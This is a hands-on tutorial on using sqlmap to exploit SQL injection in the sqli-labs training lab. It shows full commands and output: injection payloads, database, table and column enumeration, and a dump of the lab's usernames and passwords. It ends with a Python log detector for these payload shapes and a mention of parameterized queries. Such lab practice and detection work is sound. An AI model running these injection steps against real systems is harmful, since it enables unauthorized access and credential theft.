Practising sqlmap (MySQL) against sqli-labs
Vulnerable lab source code: https://github.com/Audi-1/sqli-labs
A simple demonstration of tool-assisted injection (sqlmap)
Basic test (-u url)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --level 3
[*] starting at 15:33:02
[15:33:02] [INFO] resuming back-end DBMS 'mysql'
[15:33:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1906=1906-- PKiX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6992 FROM(SELECT COUNT(*),CONCAT(0x7162786271,(SELECT (ELT(6992=6992,1))),0x7162766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yOBo
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5)-- PmIF
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-3918' UNION ALL SELECT NULL,CONCAT(0x7162786271,0x58716e444643434d644b55716c6477776464456e4673725a4b65444771624356436a56647a76586b,0x7162766a71),NULL,NULL,NULL-- eMQX
---
[15:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
Note: -v 3 (verbosity level 3) also displays the payloads that were injected.
List the databases on the DBMS (--dbs)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --dbs
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[14:51:37] [INFO] fetching database names
[14:51:38] [INFO] the SQL query used returns 6 entries
[14:51:39] [INFO] retrieved: information_schema
[14:51:41] [INFO] retrieved: challenges
[14:51:42] [INFO] retrieved: mysql
[14:51:43] [INFO] retrieved: performance_schema
[14:51:44] [INFO] retrieved: security
[14:51:45] [INFO] retrieved: test
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
List the tables of a database (--tables -D database_name; without -D, the tables of every database are listed)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --tables -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:03:02] [INFO] fetching tables for database: 'security'
[15:03:03] [INFO] the SQL query used returns 4 entries
[15:03:04] [INFO] retrieved: emails
[15:03:05] [INFO] retrieved: referers
[15:03:06] [INFO] retrieved: uagents
[15:03:07] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
List the columns of a table (--columns -T table_name -D database_name; without -D, the current database is used by default)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --column -T 'users' -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:08:34] [INFO] fetching columns for table 'users' in database 'security'
[15:08:36] [INFO] the SQL query used returns 5 entries
[15:08:37] [INFO] retrieved: "id","int(3)"
[15:08:38] [INFO] retrieved: "username","varchar(20)"
[15:08:39] [INFO] retrieved: "password","varchar(20)"
[15:08:40] [INFO] retrieved: "first_name","varchar(8)"
[15:08:41] [INFO] retrieved: "last_name","varchar(8)"
Database: security
Table: users
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| first_name | varchar(8) |
| id | int(3) |
| last_name | varchar(8) |
| password | varchar(20) |
| username | varchar(20) |
+------------+-------------+
Dump the contents of a table (--dump -C column1,column2 -T tablename -D databasename)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --dump -C 'username','password' -T 'users' -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:19:18] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'security'
[15:19:18] [INFO] the SQL query used returns 13 entries
[15:19:19] [INFO] retrieved: "Dumb","Dumb"
[15:19:20] [INFO] retrieved: "I-kill-you","Angelina"
[15:19:21] [INFO] retrieved: "p@ssword","Dummy"
[15:19:22] [INFO] retrieved: "crappy","secure"
[15:19:23] [INFO] retrieved: "stupidity","stupid"
[15:19:24] [INFO] retrieved: "genious","superman"
[15:19:25] [INFO] retrieved: "mob!le","batman"
[15:19:26] [INFO] retrieved: "admin","admin"
[15:19:27] [INFO] retrieved: "admin1","admin1"
[15:19:29] [INFO] retrieved: "admin2","admin2"
[15:19:30] [INFO] retrieved: "admin3","admin3"
[15:19:31] [INFO] retrieved: "dumbo","dhakkan"
[15:19:32] [INFO] retrieved: "admin4","admin4"
[15:19:32] [INFO] analyzing table dump for possible password hashes
Database: security
Table: users
[13 entries]
+----------+------------+
| username | password |
+----------+------------+
| Dumb | Dumb |
| Angelina | I-kill-you |
| Dummy | p@ssword |
| secure | crappy |
| stupid | stupidity |
| superman | genious |
| batman | mob!le |
| admin | admin |
| admin1 | admin1 |
| admin2 | admin2 |
| admin3 | admin3 |
| dhakkan | dumbo |
| admin4 | admin4 |
+----------+------------+
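On the defensive side, the four injection techniques sqlmap listed for Less-1 above (boolean-based tautology, error-based FLOOR(RAND(0)*2), SLEEP()-based time delay, UNION SELECT NULL,...) are all visible in the web server's access log. The following Python detector is an added example, not code from the original post or from sqli-labs: it URL-decodes the query string of each log line, matches the payload shapes against simple rules, and aggregates hits per client. The log lines, the client IP and the rule names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines (not the lab's real logs); the query
# strings reproduce the payload shapes sqlmap reported for Less-1 above.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2024:15:33:02 +0000] "GET /sqli-labs/Less-1/?id=1 HTTP/1.1" 200 720
10.0.0.5 - - [12/Mar/2024:15:33:03 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%201906%3D1906--%20PKiX HTTP/1.1" 200 720
10.0.0.5 - - [12/Mar/2024:15:33:04 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%20SLEEP%285%29--%20PmIF HTTP/1.1" 200 720
10.0.0.5 - - [12/Mar/2024:15:33:05 +0000] "GET /sqli-labs/Less-1/?id=-3918%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL--%20eMQX HTTP/1.1" 200 900
10.0.0.5 - - [12/Mar/2024:15:33:06 +0000] "GET /sqli-labs/Less-1/?id=1%27%20AND%20%28SELECT%201%20FROM%28SELECT%20COUNT%28%2A%29%2CFLOOR%28RAND%280%29%2A2%29x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x%29a%29-- HTTP/1.1" 500 300
"""

# One rule per technique in the sqlmap summary above; the rule names are my own labels.
RULES = {
    "boolean_tautology": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),          # AND 1906=1906
    "time_based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),                # SLEEP(5)
    "union_select": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),           # UNION ALL SELECT NULL,...
    "error_based_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),  # FLOOR(RAND(0)*2)
}

# client ip, ident, user, [timestamp], "METHOD target ..."
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')


def classify(line):
    """Return (client_ip, [matched rule names]) or None for an unparsable line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    ip, target = m.groups()
    # Decode %27, %20, %28 ... and '+' so the rules see the same text the DBMS saw.
    query = unquote_plus(target.partition("?")[2])
    return ip, [name for name, rx in RULES.items() if rx.search(query)]


def scan(log_text):
    """Aggregate matched techniques per client. Several distinct techniques from
    one client in a short window is the sqlmap-like signature, not any single hit."""
    per_ip = {}
    for line in log_text.splitlines():
        res = classify(line)
        if res and res[1]:
            per_ip.setdefault(res[0], set()).update(res[1])
    return {ip: sorted(names) for ip, names in per_ip.items()}


if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(names))
```

The real fix for Less-1 is, of course, a parameterized query in the PHP page rather than log matching; the detector only tells you that someone is probing.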